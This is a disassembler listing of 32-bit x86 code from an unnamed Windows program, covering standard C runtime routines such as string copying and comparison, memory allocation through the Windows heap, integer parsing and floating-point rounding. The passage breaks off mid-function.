neg ecx
jmp off_4157F0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41572C: ; CODE XREF: sub_415560+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_415744
and eax, 3
sub ecx, eax
jmp dword ptr loc_415744+4[eax*4]
; ---------------------------------------------------------------------------
loc_415744: ; CODE XREF: sub_415560+1D6�j
; DATA XREF: sub_415560+1DD�r
jmp off_415840[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_415758
dd offset loc_415778
dd offset loc_4157A0
; ---------------------------------------------------------------------------
loc_415758: ; DATA XREF: sub_415560+1EC�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_415720
std
rep movsd
cld
jmp off_415840[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_415778: ; DATA XREF: sub_415560+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_415720
std
rep movsd
cld
jmp off_415840[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4157A0: ; DATA XREF: sub_415560+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_415720
std
rep movsd
cld
jmp off_415840[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4157F4
dd offset loc_4157FC
dd offset loc_415804
dd offset loc_41580C
dd offset loc_415814
dd offset loc_41581C
dd offset loc_415824
off_4157F0 dd offset loc_415837 ; DATA XREF: sub_415560+1C2�r
; ---------------------------------------------------------------------------
loc_4157F4: ; DATA XREF: sub_415560+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4157FC: ; DATA XREF: sub_415560+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_415804: ; DATA XREF: sub_415560+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41580C: ; DATA XREF: sub_415560+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_415814: ; DATA XREF: sub_415560+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41581C: ; DATA XREF: sub_415560+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_415824: ; DATA XREF: sub_415560+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_415837: ; CODE XREF: sub_415560+1C2�j
; DATA XREF: sub_415560:off_4157F0�o
jmp off_415840[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_415840 dd offset loc_415850 ; DATA XREF: sub_415560+1B7�r
; sub_415560:loc_415744�r ...
dd offset loc_415858
dd offset loc_415868
dd offset loc_41587C
; ---------------------------------------------------------------------------
loc_415850: ; CODE XREF: sub_415560+1B7�j
; sub_415560:loc_415744�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_415858: ; CODE XREF: sub_415560+1B7�j
; sub_415560:loc_415744�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_415868: ; CODE XREF: sub_415560+1B7�j
; sub_415560:loc_415744�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41587C: ; CODE XREF: sub_415560+1B7�j
; sub_415560:loc_415744�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_415560 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4158A0 proc near ; CODE XREF: sub_4010B5+FC�p
; sub_4010B5+118�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_4158EC
loc_4158B0: ; CODE XREF: sub_4158A0+3C�j
; sub_4158A0+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_4158E4
or al, al
jz short loc_4158E0
cmp ah, [ecx+1]
jnz short loc_4158E4
or ah, ah
jz short loc_4158E0
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_4158E4
or al, al
jz short loc_4158E0
cmp ah, [ecx+3]
jnz short loc_4158E4
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_4158B0
mov edi, edi
loc_4158E0: ; CODE XREF: sub_4158A0+18�j
; sub_4158A0+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_4158E4: ; CODE XREF: sub_4158A0+14�j
; sub_4158A0+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_4158EC: ; CODE XREF: sub_4158A0+E�j
test edx, 1
jz short loc_415908
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_4158E4
inc ecx
or al, al
jz short loc_4158E0
test edx, 2
jz short loc_4158B0
loc_415908: ; CODE XREF: sub_4158A0+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_4158E4
or al, al
jz short loc_4158E0
cmp ah, [ecx+1]
jnz short loc_4158E4
or ah, ah
jz short loc_4158E0
add ecx, 2
jmp short loc_4158B0
sub_4158A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415930 proc near ; CODE XREF: sub_4010B5+19E�p
; sub_401A76+11B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_415949
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_415949: ; CODE XREF: sub_415930+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_415930 endp
; =============== S U B R O U T I N E =======================================
sub_415964 proc near ; CODE XREF: sub_4159EF+4�p
; sub_41EBF2+1A2�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_41596C: ; CODE XREF: sub_415964+34�j
cmp ds:dword_42F56C, 1
jle short loc_415984
movzx eax, byte ptr [edi]
push 8
push eax
call sub_418762
pop ecx
pop ecx
jmp short loc_415993
; ---------------------------------------------------------------------------
loc_415984: ; CODE XREF: sub_415964+F�j
movzx eax, byte ptr [edi]
mov ecx, ds:off_42F360
mov al, [ecx+eax*2]
and eax, 8
loc_415993: ; CODE XREF: sub_415964+1E�j
test eax, eax
jz short loc_41599A
inc edi
jmp short loc_41596C
; ---------------------------------------------------------------------------
loc_41599A: ; CODE XREF: sub_415964+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_4159AA
cmp esi, 2Bh
jnz short loc_4159AE
loc_4159AA: ; CODE XREF: sub_415964+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_4159AE: ; CODE XREF: sub_415964+44�j
xor ebx, ebx
loc_4159B0: ; CODE XREF: sub_415964+7B�j
cmp ds:dword_42F56C, 1
jle short loc_4159C5
push 4
push esi
call sub_418762
pop ecx
pop ecx
jmp short loc_4159D0
; ---------------------------------------------------------------------------
loc_4159C5: ; CODE XREF: sub_415964+53�j
mov eax, ds:off_42F360
mov al, [eax+esi*2]
and eax, 4
loc_4159D0: ; CODE XREF: sub_415964+5F�j
test eax, eax
jz short loc_4159E1
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_4159B0
; ---------------------------------------------------------------------------
loc_4159E1: ; CODE XREF: sub_415964+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_4159EA
neg eax
loc_4159EA: ; CODE XREF: sub_415964+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_415964 endp
; =============== S U B R O U T I N E =======================================
sub_4159EF proc near ; CODE XREF: sub_4013EC+12�p
; sub_4013EC+1D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_415964
pop ecx
retn
sub_4159EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4159FA proc near ; CODE XREF: sub_40144A+318�p
; sub_401D82+460�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_417F58
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_415A39
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_415A46
; ---------------------------------------------------------------------------
loc_415A39: ; CODE XREF: sub_4159FA+35�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_417E43
pop ecx
pop ecx
loc_415A46: ; CODE XREF: sub_4159FA+3D�j
mov eax, esi
pop esi
leave
retn
sub_4159FA endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415A50 proc near ; CODE XREF: sub_401D82+2D8�p
; sub_401D82+2F8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_415ACA
mov dh, [ecx+1]
test dh, dh
jz short loc_415AB7
loc_415A68: ; CODE XREF: sub_415A50+52�j
; sub_415A50+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_415A8A
test al, al
jz short loc_415A84
loc_415A79: ; CODE XREF: sub_415A50+32�j
mov al, [esi]
inc esi
loc_415A7C: ; CODE XREF: sub_415A50+3F�j
cmp al, dl
jz short loc_415A8A
test al, al
jnz short loc_415A79
loc_415A84: ; CODE XREF: sub_415A50+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_415A8A: ; CODE XREF: sub_415A50+23�j
; sub_415A50+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_415A7C
lea edi, [esi-1]
loc_415A94: ; CODE XREF: sub_415A50+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_415AC3
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_415A68
mov al, [ecx+3]
test al, al
jz short loc_415AC3
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_415A94
jmp short loc_415A68
; ---------------------------------------------------------------------------
loc_415AB7: ; CODE XREF: sub_415A50+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_417076
; ---------------------------------------------------------------------------
loc_415AC3: ; CODE XREF: sub_415A50+49�j
; sub_415A50+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_415ACA: ; CODE XREF: sub_415A50+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_415A50 endp
; =============== S U B R O U T I N E =======================================
sub_415AD0 proc near ; CODE XREF: sub_4022C6+94�p
; sub_40409E+7C�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
mov eax, [esi+0Ch]
test al, 40h
jz short loc_415AE5
or eax, 0FFFFFFFFh
jmp short loc_415B1F
; ---------------------------------------------------------------------------
loc_415AE5: ; CODE XREF: sub_415AD0+E�j
test al, 83h
jz short loc_415B1D
push esi
call sub_4188F0
push esi
mov edi, eax
call sub_41888A
push dword ptr [esi+10h]
call sub_4187D7
add esp, 0Ch
test eax, eax
jge short loc_415B0B
or edi, 0FFFFFFFFh
jmp short loc_415B1D
; ---------------------------------------------------------------------------
loc_415B0B: ; CODE XREF: sub_415AD0+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_415B1D
push eax
call sub_415DE1
and dword ptr [esi+1Ch], 0
pop ecx
loc_415B1D: ; CODE XREF: sub_415AD0+17�j
; sub_415AD0+39�j ...
mov eax, edi
loc_415B1F: ; CODE XREF: sub_415AD0+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_415AD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B26 proc near ; CODE XREF: sub_4022C6+8E�p
; sub_40D2E0+2B0F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call sub_4189C2
mov esi, eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_417F58
push [ebp+arg_0]
mov edi, eax
push esi
call sub_418A4F
add esp, 18h
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_415B26 endp
; =============== S U B R O U T I N E =======================================
sub_415B58 proc near ; CODE XREF: sub_415B78+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_418BFC
test eax, eax
jnz short loc_415B62
retn
; ---------------------------------------------------------------------------
loc_415B62: ; CODE XREF: sub_415B58+7�j
push eax
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_418A8C
add esp, 10h
retn
sub_415B58 endp
; =============== S U B R O U T I N E =======================================
sub_415B78 proc near ; CODE XREF: sub_4022C6+54�p
; sub_40409E+2A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_415B58
add esp, 0Ch
retn
sub_415B78 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415B90 proc near ; CODE XREF: sub_404138+2BF�p
; sub_408E1D+75�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_415C01
sub_415B90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415BA0 proc near ; CODE XREF: sub_4022C6+32�p
; sub_4022C6+43�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_415BBC
loc_415BAD: ; CODE XREF: sub_415BA0+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_415BEF
test ecx, 3
jnz short loc_415BAD
loc_415BBC: ; CODE XREF: sub_415BA0+B�j
; sub_415BA0+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_415BBC
mov eax, [ecx-4]
test al, al
jz short loc_415BFE
test ah, ah
jz short loc_415BF9
test eax, 0FF0000h
jz short loc_415BF4
test eax, 0FF000000h
jz short loc_415BEF
jmp short loc_415BBC
; ---------------------------------------------------------------------------
loc_415BEF: ; CODE XREF: sub_415BA0+12�j
; sub_415BA0+4B�j
lea edi, [ecx-1]
jmp short loc_415C01
; ---------------------------------------------------------------------------
loc_415BF4: ; CODE XREF: sub_415BA0+44�j
lea edi, [ecx-2]
jmp short loc_415C01
; ---------------------------------------------------------------------------
loc_415BF9: ; CODE XREF: sub_415BA0+3D�j
lea edi, [ecx-3]
jmp short loc_415C01
; ---------------------------------------------------------------------------
loc_415BFE: ; CODE XREF: sub_415BA0+39�j
lea edi, [ecx-4]
loc_415C01: ; CODE XREF: sub_415B90+5�j
; sub_415BA0+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_415C26
loc_415C0D: ; CODE XREF: sub_415BA0+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_415C78
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_415C0D
jmp short loc_415C26
; ---------------------------------------------------------------------------
loc_415C21: ; CODE XREF: sub_415BA0+9E�j
; sub_415BA0+B8�j
mov [edi], edx
add edi, 4
loc_415C26: ; CODE XREF: sub_415BA0+6B�j
; sub_415BA0+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_415C21
test dl, dl
jz short loc_415C78
test dh, dh
jz short loc_415C6F
test edx, 0FF0000h
jz short loc_415C62
test edx, 0FF000000h
jz short loc_415C5A
jmp short loc_415C21
; ---------------------------------------------------------------------------
loc_415C5A: ; CODE XREF: sub_415BA0+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_415C62: ; CODE XREF: sub_415BA0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_415C6F: ; CODE XREF: sub_415BA0+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_415C78: ; CODE XREF: sub_415BA0+72�j
; sub_415BA0+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_415BA0 endp
; =============== S U B R O U T I N E =======================================
sub_415C80 proc near ; CODE XREF: sub_4023A7+1A7�p
; sub_4023A7:loc_402561�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_415CA0
loc_415C8C: ; CODE XREF: sub_415C80+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_415CD3
test ecx, 3
jnz short loc_415C8C
add eax, 0
loc_415CA0: ; CODE XREF: sub_415C80+A�j
; sub_415C80+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_415CA0
mov eax, [ecx-4]
test al, al
jz short loc_415CF1
test ah, ah
jz short loc_415CE7
test eax, 0FF0000h
jz short loc_415CDD
test eax, 0FF000000h
jz short loc_415CD3
jmp short loc_415CA0
; ---------------------------------------------------------------------------
loc_415CD3: ; CODE XREF: sub_415C80+11�j
; sub_415C80+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_415CDD: ; CODE XREF: sub_415C80+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_415CE7: ; CODE XREF: sub_415C80+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_415CF1: ; CODE XREF: sub_415C80+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_415C80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415D00 proc near ; CODE XREF: sub_402688+8�p
; sub_404138+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_415D20
loc_415D0C: ; CODE XREF: sub_415D00+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_415D0C
loc_415D20: ; CODE XREF: sub_415D00+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_415D00 endp
; =============== S U B R O U T I N E =======================================
sub_415D2F proc near ; CODE XREF: sub_4029F3+A�p
; sub_402A2D+12�p ...
arg_0 = dword ptr 4
push ds:dword_4C90E4
push [esp+4+arg_0]
call sub_415D41
pop ecx
pop ecx
retn
sub_415D2F endp
; =============== S U B R O U T I N E =======================================
sub_415D41 proc near ; CODE XREF: sub_415D2F+A�p
; sub_4167A5+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_415D6A
loc_415D48: ; CODE XREF: sub_415D41+27�j
push [esp+arg_0]
call sub_415D6D
test eax, eax
pop ecx
jnz short locret_415D6C
cmp [esp+arg_4], eax
jz short locret_415D6C
push [esp+arg_0]
call sub_418C74
test eax, eax
pop ecx
jnz short loc_415D48
loc_415D6A: ; CODE XREF: sub_415D41+5�j
xor eax, eax
locret_415D6C: ; CODE XREF: sub_415D41+13�j
; sub_415D41+19�j
retn
sub_415D41 endp
; =============== S U B R O U T I N E =======================================
sub_415D6D proc near ; CODE XREF: sub_415D41+B�p
arg_0 = dword ptr 4
mov eax, ds:dword_4CA708
push esi
mov esi, [esp+4+arg_0]
cmp eax, 3
jnz short loc_415D91
cmp esi, ds:dword_4CA700
ja short loc_415DC3
push esi
call sub_4191FD
test eax, eax
pop ecx
jz short loc_415DC3
pop esi
retn
; ---------------------------------------------------------------------------
loc_415D91: ; CODE XREF: sub_415D6D+D�j
cmp eax, 2
jnz short loc_415DC3
mov eax, [esp+4+arg_0]
test eax, eax
jz short loc_415DA6
lea esi, [eax+0Fh]
and esi, 0FFFFFFF0h
jmp short loc_415DA9
; ---------------------------------------------------------------------------
loc_415DA6: ; CODE XREF: sub_415D6D+2F�j
push 10h
pop esi
loc_415DA9: ; CODE XREF: sub_415D6D+37�j
cmp esi, ds:dword_4315A4
ja short loc_415DD0
mov eax, esi
shr eax, 4
push eax
call sub_419CA0
test eax, eax
pop ecx
jnz short loc_415DDF
jmp short loc_415DD0
; ---------------------------------------------------------------------------
loc_415DC3: ; CODE XREF: sub_415D6D+15�j
; sub_415D6D+20�j ...
test esi, esi
jnz short loc_415DCA
push 1
pop esi
loc_415DCA: ; CODE XREF: sub_415D6D+58�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_415DD0: ; CODE XREF: sub_415D6D+42�j
; sub_415D6D+54�j
push esi
push 0
push ds:dword_4CA704
call ds:dword_4220C8 ; RtlAllocateHeap
loc_415DDF: ; CODE XREF: sub_415D6D+52�j
pop esi
retn
sub_415D6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DE1 proc near ; CODE XREF: sub_402A82+A�p
; sub_402A9B+7B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_415E47
mov eax, ds:dword_4CA708
cmp eax, 3
jnz short loc_415E0D
push esi
call sub_418EA9
pop ecx
test eax, eax
push esi
jz short loc_415E39
push eax
call sub_418ED4
pop ecx
pop ecx
jmp short loc_415E47
; ---------------------------------------------------------------------------
loc_415E0D: ; CODE XREF: sub_415DE1+14�j
cmp eax, 2
jnz short loc_415E38
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_4]
push eax
push esi
call sub_419C04
add esp, 0Ch
test eax, eax
jz short loc_415E38
push eax
push [ebp+arg_0]
push [ebp+var_4]
call sub_419C5B
add esp, 0Ch
jmp short loc_415E47
; ---------------------------------------------------------------------------
loc_415E38: ; CODE XREF: sub_415DE1+2F�j
; sub_415DE1+44�j
push esi
loc_415E39: ; CODE XREF: sub_415DE1+20�j
push 0
push ds:dword_4CA704
call ds:dword_4220C4 ; RtlFreeHeap
loc_415E47: ; CODE XREF: sub_415DE1+A�j
; sub_415DE1+2A�j ...
pop esi
leave
retn
sub_415DE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415E4A(double)
sub_415E4A proc near ; CODE XREF: sub_4031B3+38�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push ds:dword_42F320
call sub_41A89D
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_415ED0
call sub_41A765
pop ecx
test eax, eax
pop ecx
jle short loc_415EB3
cmp eax, 2
jle short loc_415EA5
cmp eax, 3
jnz short loc_415EB3
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Bh ; double
call sub_41A075
add esp, 10h
jmp short loc_415F15
; ---------------------------------------------------------------------------
loc_415EA5: ; CODE XREF: sub_415E4A+3F�j
push esi
push ebx
call sub_41A89D
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_415F15
; ---------------------------------------------------------------------------
loc_415EB3: ; CODE XREF: sub_415E4A+3A�j
; sub_415E4A+44�j
fld [ebp+arg_0]
fadd ds:dbl_422690
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Bh
push 8
jmp short loc_415F0D
; ---------------------------------------------------------------------------
loc_415ED0: ; CODE XREF: sub_415E4A+2F�j
call sub_41A72A
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_415EF3
loc_415EE5: ; CODE XREF: sub_415E4A+AC�j
push esi
push ebx
call sub_41A89D
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_415F15
; ---------------------------------------------------------------------------
loc_415EF3: ; CODE XREF: sub_415E4A+99�j
test bl, 20h
jnz short loc_415EE5
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Bh ; int
push 10h ; int
loc_415F0D: ; CODE XREF: sub_415E4A+84�j
call sub_41A0C8
add esp, 1Ch
loc_415F15: ; CODE XREF: sub_415E4A+59�j
; sub_415E4A+67�j ...
pop esi
pop ebx
leave
retn
sub_415E4A endp
; =============== S U B R O U T I N E =======================================
sub_415F19 proc near ; CODE XREF: sub_417BD8+9�p
; sub_41A966+21�p
; DATA XREF: ...
call sub_415F31
call sub_41A966
mov ds:dword_4C9064, eax
call sub_41A916
fnclex
retn
sub_415F19 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_415F31 proc near ; CODE XREF: sub_415F19�p
mov eax, offset sub_41AD54
mov ds:off_4316C4, offset sub_41A9E9
mov ds:off_4316C0, eax
mov ds:off_4316C8, offset sub_41AA4F
mov ds:off_4316CC, offset sub_41A98F
mov ds:off_4316D0, offset sub_41AA37
mov ds:off_4316D4, eax
retn
sub_415F31 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F6C proc near ; CODE XREF: sub_4031B3+1B�p
; sub_4031B3+44�p ...
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_415F6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415F93(double)
sub_415F93 proc near ; CODE XREF: sub_4031FF+82�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push ds:dword_42F338
call sub_41A89D
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_416019
call sub_41A765
pop ecx
test eax, eax
pop ecx
jle short loc_415FFC
cmp eax, 2
jle short loc_415FEE
cmp eax, 3
jnz short loc_415FFC
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Ch ; double
call sub_41A075
add esp, 10h
jmp short loc_41605E
; ---------------------------------------------------------------------------
loc_415FEE: ; CODE XREF: sub_415F93+3F�j
push esi
push ebx
call sub_41A89D
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_41605E
; ---------------------------------------------------------------------------
loc_415FFC: ; CODE XREF: sub_415F93+3A�j
; sub_415F93+44�j
fld [ebp+arg_0]
fadd ds:dbl_422690
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_416056
; ---------------------------------------------------------------------------
loc_416019: ; CODE XREF: sub_415F93+2F�j
call sub_41A72A
fstp [ebp+var_8]
